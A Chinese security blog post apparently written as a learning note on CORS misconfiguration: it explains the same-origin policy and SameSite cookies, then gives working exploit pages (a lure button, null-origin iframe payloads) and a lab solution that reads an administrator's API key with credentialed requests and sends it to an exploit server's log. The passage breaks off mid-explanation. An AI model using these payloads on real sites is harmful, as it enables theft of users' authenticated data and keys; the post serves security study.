
<!DOCTYPE html><html lang="en">

<head>
  <meta charset="utf-8">
  <meta name="hexo-theme" content="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.33.1" theme-name="Stellar" theme-version="1.33.1">
  
  
  <meta name="generator" content="Hexo 6.3.0">
  <meta http-equiv='x-dns-prefetch-control' content='on' />
  
  <meta name="renderer" content="webkit">
  <meta name="force-rendering" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  <meta name="HandheldFriendly" content="True" >
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#000">
  <meta name="theme-color" content="#f9fafb">
  <title>CORS跨域资源共享漏洞学习 - Sherlock</title>

  
    <meta name="description" content="前言想要了解明白这个漏洞，我们就需要知道一些前提 同源策略 (Same Origin Policy) 同源策略的基本原则是：当一个浏览器加载一个源（Origin）的文档或脚本时，它将只允许该文档或脚本与其自身相同源的资源进行交互，而不允许与其他源的资源进行直接交互。这种限制有助于防止恶意网站获取用户的敏感信息或进行未经授权的操作。 同源策略通常应用于以下方面：  DOM访问限制：一个源的JavaS">
<meta property="og:type" content="article">
<meta property="og:title" content="CORS跨域资源共享漏洞学习">
<meta property="og:url" content="http://example.com/2024/03/25/CORS%E8%B7%A8%E5%9F%9F%E8%B5%84%E6%BA%90%E5%85%B1%E4%BA%AB%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/">
<meta property="og:site_name" content="Sherlock">
<meta property="og:description" content="前言想要了解明白这个漏洞，我们就需要知道一些前提 同源策略 (Same Origin Policy) 同源策略的基本原则是：当一个浏览器加载一个源（Origin）的文档或脚本时，它将只允许该文档或脚本与其自身相同源的资源进行交互，而不允许与其他源的资源进行直接交互。这种限制有助于防止恶意网站获取用户的敏感信息或进行未经授权的操作。 同源策略通常应用于以下方面：  DOM访问限制：一个源的JavaS">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/themes/hexo-theme-stellar/1.jpg">
<meta property="article:published_time" content="2024-03-25T12:53:35.000Z">
<meta property="article:modified_time" content="2024-05-15T12:30:38.192Z">
<meta property="article:author" content="Sherlock">
<meta property="article:tag" content="cors">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/themes/hexo-theme-stellar/1.jpg">
  
  
  
  <meta name="keywords" content="cors">

  <!-- feed -->
  

  <link rel="stylesheet" href="/css/main.css?v=1.33.1">


  

  

  <script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Sherlock","sameAs":[],"image":"/themes/hexo-theme-stellar/1.jpg"},"dateCreated":"2024-03-25T20:53:35+08:00","dateModified":"2024-05-15T20:30:38+08:00","datePublished":"2024-03-25T20:53:35+08:00","description":"","headline":"CORS跨域资源共享漏洞学习","mainEntityOfPage":{"@type":"WebPage","@id":"http://example.com/2024/03/25/CORS%E8%B7%A8%E5%9F%9F%E8%B5%84%E6%BA%90%E5%85%B1%E4%BA%AB%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/"},"publisher":{"@type":"Organization","name":"Sherlock","sameAs":[],"image":"/themes/hexo-theme-stellar/1.jpg","logo":{"@type":"ImageObject","url":"/themes/hexo-theme-stellar/1.jpg"}},"url":"http://example.com/2024/03/25/CORS%E8%B7%A8%E5%9F%9F%E8%B5%84%E6%BA%90%E5%85%B1%E4%BA%AB%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/","keywords":"cors","image":[]}</script>
  
</head>
<body>

<div class="l_body content" id="start" layout="post" type="tech" ><aside class="l_left"><div class="sidebg"></div><div class="leftbar-container">


<header class="header"><div class="logo-wrap"><a class="avatar" href="/about/"><div class="bg" style="opacity:0;background-image:url(https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/rainbow64@3x.webp);"></div><img no-lazy class="avatar" src="/themes/hexo-theme-stellar/1.jpg" onerror="javascript:this.classList.add('error');this.src='https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/image/2659360.svg';"></a><a class="title" href="/"><div class="main">Sherlock</div><div class="sub cap">言念君子，温其如玉</div></a></div></header>

<div class="nav-area">

<nav class="menu dis-select"><a class="nav-item active" title="博客" href="/" style="color:#1BCDFC"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" fill-rule="evenodd" d="M5.879 2.879C5 3.757 5 5.172 5 8v8c0 2.828 0 4.243.879 5.121C6.757 22 8.172 22 11 22h2c2.828 0 4.243 0 5.121-.879C19 20.243 19 18.828 19 16V8c0-2.828 0-4.243-.879-5.121C17.243 2 15.828 2 13 2h-2c-2.828 0-4.243 0-5.121.879M8.25 17a.75.75 0 0 1 .75-.75h3a.75.75 0 0 1 0 1.5H9a.75.75 0 0 1-.75-.75M9 12.25a.75.75 0 0 0 0 1.5h6a.75.75 0 0 0 0-1.5zM8.25 9A.75.75 0 0 1 9 8.25h6a.75.75 0 0 1 0 1.5H9A.75.75 0 0 1 8.25 9" clip-rule="evenodd"/><path fill="currentColor" d="M5.235 4.058C5 4.941 5 6.177 5 8v8c0 1.823 0 3.058.235 3.942L5 19.924c-.975-.096-1.631-.313-2.121-.803C2 18.243 2 16.828 2 14v-4c0-2.829 0-4.243.879-5.121c.49-.49 1.146-.707 2.121-.803zm13.53 15.884C19 19.058 19 17.822 19 16V8c0-1.823 0-3.059-.235-3.942l.235.018c.975.096 1.631.313 2.121.803C22 5.757 22 7.17 22 9.999v4c0 2.83 0 4.243-.879 5.122c-.49.49-1.146.707-2.121.803z" opacity=".5"/></svg></a><a class="nav-item" title="社交" href="/friends/" style="color:#F44336"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="m13.629 20.472l-.542.916c-.483.816-1.69.816-2.174 0l-.542-.916c-.42-.71-.63-1.066-.968-1.262c-.338-.197-.763-.204-1.613-.219c-1.256-.021-2.043-.098-2.703-.372a5 5 0 0 1-2.706-2.706C2 14.995 2 13.83 2 11.5v-1c0-3.273 0-4.91.737-6.112a5 5 0 0 1 1.65-1.651C5.59 2 7.228 2 10.5 2h3c3.273 0 4.91 0 6.113.737a5 5 0 0 1 1.65 1.65C22 5.59 22 7.228 22 10.5v1c0 2.33 0 3.495-.38 4.413a5 5 0 0 1-2.707 2.706c-.66.274-1.447.35-2.703.372c-.85.015-1.275.022-1.613.219c-.338.196-.548.551-.968 1.262" opacity=".5"/><path fill="currentColor" d="M10.99 14.308c-1.327-.978-3.49-2.84-3.49-4.593c0-2.677 2.475-3.677 4.5-1.609c2.025-2.068 4.5-1.068 4.5 1.609c0 1.752-2.163 3.615-3.49 4.593c-.454.335-.681.502-1.01.502c-.329 0-.556-.167-1.01-.502"/></svg></a></nav>
</div>
<div class="widgets">
<div class="search-wrapper" id="search-wrapper"><form class="search-form"><a class="search-button" onclick="document.getElementById(&quot;search-input&quot;).focus();"><svg t="1705074644177" viewBox="0 0 1025 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1560" width="200" height="200"><path d="M1008.839137 935.96571L792.364903 719.491476a56.783488 56.783488 0 0 0-80.152866 0 358.53545 358.53545 0 1 1 100.857314-335.166073 362.840335 362.840335 0 0 1-3.689902 170.145468 51.248635 51.248635 0 1 0 99.217358 26.444296 462.057693 462.057693 0 1 0-158.255785 242.303546l185.930047 185.725053a51.248635 51.248635 0 0 0 72.568068 0 51.248635 51.248635 0 0 0 0-72.978056z" p-id="1561"></path><path d="M616.479587 615.969233a50.428657 50.428657 0 0 0-61.498362-5.534852 174.655348 174.655348 0 0 1-177.525271 3.484907 49.403684 49.403684 0 0 0-58.833433 6.76482l-3.074918 2.869923a49.403684 49.403684 0 0 0 8.609771 78.10292 277.767601 277.767601 0 0 0 286.992355-5.739847 49.403684 49.403684 0 0 0 8.404776-76.667958z" p-id="1562"></path></svg></a><input type="text" class="search-input" id="search-input" placeholder="Search"></form><div id="search-result"></div><div class="search-no-result">No Results!</div></div>



<widget class="widget-wrapper recent post-list"><div class="widget-header dis-select"><span class="name">Recent Update</span></div><div class="widget-body fs14"><a class="item title" href="/2024/10/24/java%E7%B1%BB%E5%8A%A0%E8%BD%BD/"><span class="title">java类加载</span></a><a class="item title" href="/2025/06/30/xss%E5%9C%A8%E4%BC%81%E4%B8%9Asrc%E4%B8%AD%E7%9A%84%E6%8C%96%E6%8E%98%E5%A7%BF%E5%8A%BF/"><span class="title">xss在企业src中的挖掘姿势</span></a><a class="item title" href="/2025/08/23/CodeQl-%E5%85%A5%E9%97%A8/"><span class="title">CodeQl 入门</span></a><a class="item title" href="/2025/08/15/%E5%8F%8D%E5%BC%B9shell%E5%8D%87%E7%BA%A7%E4%B8%BA%E5%AE%8C%E5%85%A8%E4%BA%A4%E4%BA%92%E5%BC%8Fshell/"><span class="title">反弹shell升级为完全交互式shell</span></a><a class="item title" href="/2025/08/15/linux-webshell%E6%8F%90%E6%9D%83/"><span class="title">linux webshell提权</span></a><a class="item title" href="/2025/08/20/Tomcat-URL%E8%A7%A3%E6%9E%90%E5%B7%AE%E5%BC%82%E6%80%A7%E5%AF%BC%E8%87%B4%E7%9A%84%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/"><span class="title">Tomcat URL解析差异性导致的安全问题</span></a><a class="item title" href="/2025/08/20/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-initial/"><span class="title">春秋云镜-initial</span></a><a class="item title" href="/2025/04/28/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8Byso%E4%B8%AD%E7%9A%84spring%E9%93%BE%E5%AD%90%E5%88%86%E6%9E%90/"><span class="title">java反序列化之yso中的spring链子分析</span></a><a class="item title" href="/2025/08/01/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-jshERP-3-5/"><span class="title">代码审计-jshERP-3.5</span></a><a class="item title" href="/2025/07/20/CTF-java%E4%B8%93%E9%A2%98/"><span class="title">CTF-java专题</span></a></div></widget>
</div>

</div></aside><div class="l_main" id="main">





<div class="article banner top">
  <div class="content">
    <div class="top bread-nav footnote"><div class="left"><div class="flex-row" id="breadcrumb"><a class="cap breadcrumb" href="/">Home</a>
<span class="sep"></span><a class="cap breadcrumb" href="/">Blog</a><span class="sep"></span><a class="cap breadcrumb-link" href="/categories/CTF/">CTF</a></div>
<div class="flex-row" id="post-meta"><span class="text created">Posted on: <time datetime="2024-03-25T12:53:35.000Z">2024-03-25</time></span><span class="sep updated"></span><span class="text updated">Updated on: <time datetime="2024-05-15T12:30:38.192Z">2024-05-15</time></span></div></div></div>
    
    <div class="bottom only-title">
      
      <div class="text-area">
        <h1 class="text title"><span>CORS跨域资源共享漏洞学习</span></h1>
        
      </div>
    </div>
    
  </div>
  </div><article class="md-text content"><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>想要了解明白这个漏洞，我们就需要知道一些前提</p>
<p><strong>同源策略 (Same Origin Policy)</strong></p>
<p>同源策略的基本原则是：当一个浏览器加载一个源（Origin）的文档或脚本时，它将只允许该文档或脚本与其自身相同源的资源进行交互，而不允许与其他源的资源进行直接交互。这种限制有助于防止恶意网站获取用户的敏感信息或进行未经授权的操作。</p>
<p>同源策略通常应用于以下方面：</p>
<ol>
<li><strong>DOM访问限制</strong>：一个源的JavaScript代码只能访问来自相同源的DOM对象，不能直接操作其他源的DOM对象。</li>
<li><strong>Cookie限制</strong>：浏览器会将Cookie与其关联的源关联起来，并且在同源策略下，一个源的Cookie不会被发送到另一个源。</li>
<li><strong>XHR请求限制</strong>：XMLHttpRequest对象（用于AJAX请求）在同源策略下只能向同一源发起请求。</li>
<li><strong>Frame和iFrame限制</strong>：同源策略限制了页面中一个frame或iframe内加载的内容只能来自相同的源。</li>
</ol>
<p>两个URL只有在以下所有方面都匹配时才被视为同源：</p>
<ol>
<li><strong>协议（Protocol）</strong>：两个URL的协议必须相同，例如都是HTTP或都是HTTPS。</li>
<li><strong>主机名（Host）</strong>：两个URL的主机名（域名或IP地址）必须完全相同。</li>
<li><strong>端口（Port）</strong>：如果指定了端口号，那么两个URL的端口号必须相同。如果未指定端口号，则默认使用HTTP的80端口和HTTPS的443端口</li>
</ol>
<p> 同时满足这三种条件就是同源，当存在两个站点，其中有一项不满足相同条件的时候，我们即可说这两个站点不是同源站点，而当其中一个站点想请求另外一个站点的资源的时候我们边称它为<code>跨域请求</code>，而由于安全考虑，<code>跨域请求</code>会受到同源策略的限制</p>
<p><strong>不受影响的标签</strong></p>
<p> 在HTML中&lt;a&gt;, &lt;form&gt;, &lt;img&gt;, &lt;script&gt;, &lt;iframe&gt;, &lt;link&gt; 等标签以及 Ajax 都可以指向一个资源地址</p>
<p> 在这些标签中有以下的标签不受同源策略的限制</p>
<ol>
<li>script</li>
<li>img</li>
<li>link</li>
<li>css</li>
</ol>
<p><strong>用户对跨域的需求</strong></p>
<ul>
<li>比如前后端分离的情况，前后端域名不同，但是前端会需要用到后端的接口，发送ajax请求</li>
<li>电商网站加载第三方快递网站的物流信息</li>
</ul>
<p><strong>跨域请求方式</strong><br>CORS定义了两种跨域请求，简单跨域请求和非简单跨域请求。只要同时满足以下两大条件，就属于简单请求。</p>
<ol>
<li>请求方法是以下三种方法之一：</li>
</ol>
<ul>
<li>HEAD</li>
<li>GET</li>
<li>POST</li>
</ul>
<ol>
<li>HTTP的头信息不超出以下几种字段：</li>
</ol>
<ul>
<li><code>Accept</code></li>
<li><code>Accept-Language</code></li>
<li><code>Content-Language</code></li>
<li><code>Last-Event-ID</code></li>
<li><code>Content-Type</code>：只限于三个值<code>application/x-www-form-urlencoded</code>、<code>multipart/form-data</code>、<code>text/plain</code></li>
</ul>
<p>简单的说就是设置了一个白名单，符合这个条件的才是简单请求。其他不符合的都是非简单请求。</p>
<p>浏览器对简单请求和非简单请求的处理机制不一样。<br>对于简单请求，浏览器就会立刻发送这个请求。<br>对于非简单请求，浏览器不会马上发送这个请求，而是有一个preflight，跟服务器验证的过程。浏览器先发送一个options方法的预检请求。</p>
<p><strong>CORS机制解决</strong></p>
<p>CORS，跨域资源共享（Cross-origin resource sharing），是H5提供的一种机制，WEB应用程序可以通过在HTTP增加字段来告诉浏览器，哪些不同来源的服务器是有权访问本站资源的，当不同域的请求发生时，就出现了跨域的现象。</p>
<p>下图是常见的跨域会遇到的请求头</p>
<p><img src="/../imgs/$%7Bfiilname%7D/image-20240326205713246.png" alt="image-20240326205713246">当对CORS配置不当的时候，就导致资源被恶意操作，也就发生了CORS漏洞</p>
<p><strong>漏洞检测</strong></p>
<p>一般情况下，修改请求包 Header 中的 Origin 字段为任意域名或者为 null 的方式去检测该漏洞是否存在</p>
<h2 id="常见的几种情况"><a href="#常见的几种情况" class="headerlink" title="常见的几种情况"></a>常见的几种情况</h2><p>如上面的图所示，用红框标记的是最有代表性的三个头，其中我们可以手动为请求加上<code>Origin</code>，然后观察响应头的<code>Access-Control-Allow-Origin</code>和<code>Access-Control-Allow-Credentials</code>的值</p>
<ul>
<li>其中Access-Control-Allow-Origin表示允许跨域访问的host</li>
</ul>
<p> 就三个值，可以设置成指定的网站，也可以设置成<code>*</code>表示允许所有host跨域访问，也可以设置为<code>null</code>，但是首先设置成null并不常见，并且也不推荐</p>
<ul>
<li>如果想跨域传输cookies,需要<code>Access-Control-Allow-Credentials</code>设置为true，并且需要与<code>XMLHttpRequest.withCredentials</code> 或Fetch API中的<code>Request()</code> 构造器中的credentials 选项结合使用，例如使用<code>XMLHttpRequest</code>的时候需要将<code>withCredentials</code>的值设置为true</li>
</ul>
<p>接下来按照常见性分为几种情况</p>
<table>
<thead>
<tr>
<th>Access-Control-Allow-Origin</th>
<th>Access-Control-Allow-Credentials</th>
<th>结果</th>
</tr>
</thead>
<tbody><tr>
<td>*</td>
<td>true</td>
<td>不存在漏洞</td>
</tr>
<tr>
<td><code>&lt;all-host&gt;&lt;/all-host&gt;</code></td>
<td>true</td>
<td>存在漏洞</td>
</tr>
<tr>
<td><code>&lt;safe_host&gt;</code></td>
<td>true</td>
<td>安全-不存在漏洞</td>
</tr>
<tr>
<td>null</td>
<td>true</td>
<td>存在漏洞</td>
</tr>
</tbody></table>
<h3 id="第一种，Allow-Origin为-，Allow-Credentials为-true"><a href="#第一种，Allow-Origin为-，Allow-Credentials为-true" class="headerlink" title="第一种，Allow-Origin为 * ，Allow-Credentials为 true"></a>第一种，Allow-Origin为 * ，Allow-Credentials为 true</h3><p>后端代码如下：</p>
<p><img src="/../imgs/$%7Bfiilname%7D/image-20240328180058915.png" alt="image-20240328180058915"></p>
<p>按照上面漏洞检测的方法检测，结果如下：</p>
<p><img src="/../imgs/$%7Bfiilname%7D/image-20240328180136118.png" alt="image-20240328180136118"></p>
<p>前面我们知道<code>Access-Control-Allow-Origin</code>表示允许跨域访问的host，我们这里设置成了通配符<code>*</code>，代表允许所有网站的跨域请求，当这种情况的时候，即便<code>Access-Control-Allow-Credentials</code>为true，那么会被认定为不安全的，将不能将cookie发送到服务端，所以我们利用会失败</p>
<p><strong>攻击服务器代码：index.jsp</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page language=&quot;java&quot; contentType=&quot;text/html; charset=UTF-8&quot;</span><br><span class="line">         pageEncoding=&quot;UTF-8&quot;%&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;h2&gt;Hello World!&lt;/h2&gt;</span><br><span class="line">    &lt;button id=&quot;attack&quot; type=&quot;button&quot; onclick=&quot;attack()&quot;&gt;点我抢红包&lt;/button&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">    function attack() &#123;</span><br><span class="line">         var xhttp = new XMLHttpRequest();</span><br><span class="line">         xhttp.onreadystatechange = function () &#123;</span><br><span class="line">             // 当响应请求完成，并且返回200的时候弹出响应体</span><br><span class="line">            if (this.readyState == 4 &amp;&amp; this.status == 200)&#123;</span><br><span class="line">                if(this.response ==&quot;&quot; || this.response == null)&#123;</span><br><span class="line">                    alert(&quot;恭喜已经绕过了同源策略，但是响应体为空，利用失败&quot;);</span><br><span class="line">                &#125;else&#123;</span><br><span class="line">                    alert(&quot;黑客已经拿到你的敏感信息----&quot;+this.response)</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        //打开靶机地址</span><br><span class="line">        xhttp.open(&quot;GET&quot;,&quot;http://192.168.1.2:8080/info&quot;,true);</span><br><span class="line">        //使用 cookie、授权标头或 TLS 客户端证书等凭据进行跨站点请求</span><br><span class="line">        xhttp.withCredentials = true;</span><br><span class="line">        xhttp.send();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>靶机地址： 192.168.1.2:8080</p>
<p>攻击服务器地址：192.168.1.251:8080</p>
<p>当用户登录状态下，访问我们的网站并点击相关按钮的时候，发下没有任何反应，这时候我们来看一下响应体和控制台，发现请求已经被同源策略禁止了</p>
<p><img src="/../imgs/$%7Bfiilname%7D/image-20240328180316312.png" alt="image-20240328180316312"></p>
<h3 id="第二种，Allow-Origin为-，Allow-Credentials为-true"><a href="#第二种，Allow-Origin为-，Allow-Credentials为-true" class="headerlink" title="第二种，Allow-Origin为&lt;all-host&gt; ，Allow-Credentials为 true&lt;/all-host&gt;"></a>第二种，Allow-Origin为<code>&lt;all-host&gt;</code> ，Allow-Credentials为 true<code>&lt;/all-host&gt;</code></h3><p>这种的话其实也相当于同意了所有站点的跨域请求，一般如果是这种情况，那么漏洞肯定存在并且可以利用，而出现漏洞的原因就是一些开发为了图方便导致的</p>
<p>后端代码如下：</p>
<p><img src="/../imgs/$%7Bfiilname%7D/image-20240328180448654.png" alt="image-20240328180448654"></p>
<p>测试的结果如下：<br><img src="/../imgs/$%7Bfiilname%7D/image-20240328180512819.png" alt="image-20240328180512819"></p>
<p>这样子的话便可以利用成功</p>
<p><img src="/../imgs/$%7Bfiilname%7D/image-20240328180543504.png" alt="image-20240328180543504"></p>
<p>但是在正常的浏览器上面尝试的话便不会成功（所看文章的作者在虚拟机上下的一个谷歌的盗版浏览器）</p>
<p><img src="/../imgs/$%7Bfiilname%7D/image-20240328180700420.png" alt="image-20240328180700420"></p>
<p>原因就是<code>SameSite</code>属性，2016年开始，Chrome <strong>51</strong>版本对Cookie新增了一个 SameSite属性，为了防止<code>CSRF</code>攻击，陆续的各大厂商的浏览器也都适配了该属性，该属性有什么用呢？如下图所示，展示了SameSite和其它跟cookie有关的设置的基本用途</p>
<p><img src="/../imgs/$%7Bfiilname%7D/image-20240328180735354.png" alt="image-20240328180735354"></p>
<p>samesite属性有三个值</p>
<ul>
<li><strong>Strict：</strong>最为严格，完全禁止第三方 Cookie，跨站点时，任何情况下都不会发送 Cookie。</li>
<li><strong>Lax：</strong>当开发开发人员没有设置samesite的值得时候，Lax是默认值，规则稍稍放宽，大多数情况也是不发送第三方 Cookie，详细如下图</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://mc-imgup.oss-cn-beijing.aliyuncs.com/202212302043275.png"><img src="/../imgs/$%7Bfiilname%7D/202212302043275.png" alt="img"></a></p>
<p>我们利用页面的请求，可以算作一个AJAX，所以当我们默认情况下去利用不会发送cookie</p>
<ul>
<li><strong>None：</strong>所有请求中都允许发送cookie，但是如果samesite配置成了none，还必须将cookie加上<code>Secure</code>属性才能够生效</li>
</ul>
<blockquote>
<p>所以当遇到https协议的站点，并且cookie的samesite被设置成None的时候，也可以利用，如下图所示，我将站点改成了https，并且加上了samesite&#x3D;None以及Secure</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://mc-imgup.oss-cn-beijing.aliyuncs.com/202212302050651.png"><img src="/../imgs/$%7Bfiilname%7D/202212302050651.png" alt="img"></a></p>
<p>利用成功，其中当Allow-Origin设置为safe-host类似</p>
<h3 id="第三种，Allow-Origin为null，Allow-Credentials为true"><a href="#第三种，Allow-Origin为null，Allow-Credentials为true" class="headerlink" title="第三种，Allow-Origin为null，Allow-Credentials为true"></a><strong>第三种，Allow-Origin为null，Allow-Credentials为true</strong></h3><p>这种情况可以被绕过，因为任何使用非分级协议（如 <code>data:</code> 或 <code>file:</code>）的资源和沙盒文件的 Origin 的序列化都被定义为‘null’，所以我们这里利用<code>iframe</code>标签，使用 data url 格式将src的值直接加载为html（同样的利用成功的前提仍然要考虑我们上述提到的samesite）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe sandbox=&quot;allow-scripts allow-top-navigation allow-forms allow-modals&quot; src=&quot;data:text/html;charset=UTF-8,&lt;script&gt;</span><br><span class="line">    var xhttp = new XMLHttpRequest();</span><br><span class="line">         xhttp.onreadystatechange = function () &#123;</span><br><span class="line">             // 当响应请求完成，并且返回200的时候弹出响应体</span><br><span class="line">            if (this.readyState == 4 &amp;&amp; this.status == 200)&#123;</span><br><span class="line">                if(this.responseText ==&#x27;&#x27; || this.responseText == null)&#123;</span><br><span class="line">                        alert(&#x27;恭喜已经绕过了同源策略，但是响应体为空，利用失败&#x27;);</span><br><span class="line">                        console.log(&#x27;no,&#x27;+this.responseText)</span><br><span class="line">                        &#125;else&#123;</span><br><span class="line">                        alert(&#x27;黑客已经拿到你的敏感信息----&#x27;+this.responseText);</span><br><span class="line">                        console.log(&#x27;yes,&#x27;+this.responseText)&#125;</span><br><span class="line">                        &#125;</span><br><span class="line">                        &#125;</span><br><span class="line">                    xhttp.open(&#x27;GET&#x27;,&#x27;https://192.168.1.2:8443/info&#x27;,true);</span><br><span class="line">                    xhttp.withCredentials = true;</span><br><span class="line">                    xhttp.send();</span><br><span class="line">    &lt;/script&gt;&quot;&gt;&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<p>利用成功</p>
<p><a target="_blank" rel="noopener" href="https://mc-imgup.oss-cn-beijing.aliyuncs.com/202212302131789.png"><img src="/../imgs/$%7Bfiilname%7D/202212302131789.png" alt="img"></a></p>
<p>当然也可以利用h5的新属性<code>srcdoc</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe sandbox=&quot;allow-scripts allow-top-navigation allow-forms allow-modals&quot; srcdoc=&quot;&lt;script&gt;</span><br><span class="line">    var xhttp = new XMLHttpRequest();</span><br><span class="line">         xhttp.onreadystatechange = function () &#123;</span><br><span class="line">             // 当响应请求完成，并且返回200的时候弹出响应体</span><br><span class="line">            if (this.readyState == 4 &amp;&amp; this.status == 200)&#123;</span><br><span class="line">                        alert(this.responseText);</span><br><span class="line">                        &#125;</span><br><span class="line">                        &#125;</span><br><span class="line">                    xhttp.open(&#x27;GET&#x27;,&#x27;https://192.168.1.2:8443/info&#x27;,true);</span><br><span class="line">                    xhttp.withCredentials = true;</span><br><span class="line">                    xhttp.send();&lt;/script&gt;</span><br><span class="line">    &quot;&gt;&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<p>同样可以利用</p>
<p><a target="_blank" rel="noopener" href="https://mc-imgup.oss-cn-beijing.aliyuncs.com/202212302148425.png"><img src="/../imgs/$%7Bfiilname%7D/202212302148425.png" alt="img"></a></p>
<h2 id="实战"><a href="#实战" class="headerlink" title="实战"></a>实战</h2><h3 id="Lab：具有基本源反射的-CORS-漏洞"><a href="#Lab：具有基本源反射的-CORS-漏洞" class="headerlink" title="Lab：具有基本源反射的 CORS 漏洞"></a>Lab：具有基本源反射的 CORS 漏洞</h3><p>要求：要解决该实验问题，请制作一些使用 CORS 检索管理员的 API 密钥并将代码上传到漏洞利用服务器的 JavaScript</p>
<p>首先我们先开启bp，关掉拦截，打开谷歌的proxy插件，然后登录题目提供给我们的账号，成功登录后查看代理模块中的HTTP历史记录，点击<code>/accountDetails</code>，观察密钥是否通过对 <code>/accountDetails</code> 的 AJAX 请求检索，并且响应包含表明它可能支持 CORS 的 <code>Access-Control-Allow-Credentials</code> 标头，所以把该条目发送到重放器里面，按照上面的方法测试一下是否含有CORS漏洞，如下所示：<br><img src="/../imgs/$%7Bfiilname%7D/image-20240328193659718.png" alt="image-20240328193659718"></p>
<p>可以发现接受所有的链接，并且Allow-Credentials为 true，有漏洞可以利用，所以我们到bp给我们提供的漏洞利用服务器中，并在其中的html代码的body部分输入以下代码：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> req = <span class="keyword">new</span> <span class="title class_">XMLHttpRequest</span>();</span></span><br><span class="line"><span class="language-javascript">    req.<span class="property">onload</span> = reqListener;</span></span><br><span class="line"><span class="language-javascript">    req.<span class="title function_">open</span>(<span class="string">&#x27;get&#x27;</span>,<span class="string">&#x27;YOUR-LAB-ID.web-security-academy.net/accountDetails&#x27;</span>,<span class="literal">true</span>);</span></span><br><span class="line"><span class="language-javascript">    req.<span class="property">withCredentials</span> = <span class="literal">true</span>;</span></span><br><span class="line"><span class="language-javascript">    req.<span class="title function_">send</span>();</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">reqListener</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        location=<span class="string">&#x27;/log?key=&#x27;</span>+<span class="variable language_">this</span>.<span class="property">responseText</span>;</span></span><br><span class="line"><span class="language-javascript">    &#125;;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>对以上代码的解释：</p>
<ol>
<li><code>var req = new XMLHttpRequest();</code>：创建了一个新的 XMLHttpRequest 对象，用于发起 HTTP 请求。</li>
<li><code>req.onload = reqListener;</code>：指定了当请求成功完成时调用的回调函数 reqListener。这意味着一旦请求成功返回数据，将会执行名为 reqListener 的函数。</li>
